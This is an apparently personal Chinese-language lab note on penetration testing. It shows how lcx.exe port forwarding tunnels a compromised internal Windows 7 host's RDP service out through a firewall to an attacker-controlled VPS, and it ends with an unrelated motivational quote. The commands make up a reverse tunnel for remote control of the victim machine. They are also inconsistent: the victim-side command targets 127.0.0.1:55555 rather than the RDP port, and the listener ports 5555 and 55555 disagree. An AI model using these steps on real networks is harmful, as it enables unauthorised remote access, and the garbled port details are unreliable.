传输层技术包括TCP隧道、UDP隧道和常规端口转发等。在渗透测试中,如果内网防火墙阻止了指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口。如果内网中存在一系列防御系统,TCP、UDP流量会被大量拦截。
1.实验环境
window 7 (VPS机器):192.168.4.137
window 7(受害者):1.1.1.10
monowall防火墙:只允许通过TCP/UDP数据
2.网络拓扑图
内网win7通过lcx.exe,将自己主机的远程端口3389的数据流量通过端口转发至远程VPS机(黑客主机)的4444端口,而黑客通过登录VPS的环回地址127.0.0.1:55555实现控住内网主机的目的
3.实验步骤
1>内网端口转发
受害者:
lcx.exe -slave 192.168.4.137 4444 127.0.0.1 55555
VPS(黑客):
lcx.exe -listen 4444 5555 //将4444端监听的流量转发到本机的55555端口
登录VPS,远程本地环回地址:127.0.0.1:5555
今天就学到这吧,
“20岁的贪玩,造就了30岁的无奈。30岁的无奈,导致了40岁的无为! 40岁的无为,奠定了50岁的失败,50岁的失败。酿造了一辈子的碌碌无为! 不要在该奋斗的年纪选择了安逸,否则,当父母需要你时,除了泪水,你一无所有;当孩子需要你时,除了惭愧,你一无所有;当自己回首过去,除了蹉跎,你还是一无所有!不要在奋斗的年龄选择安逸!”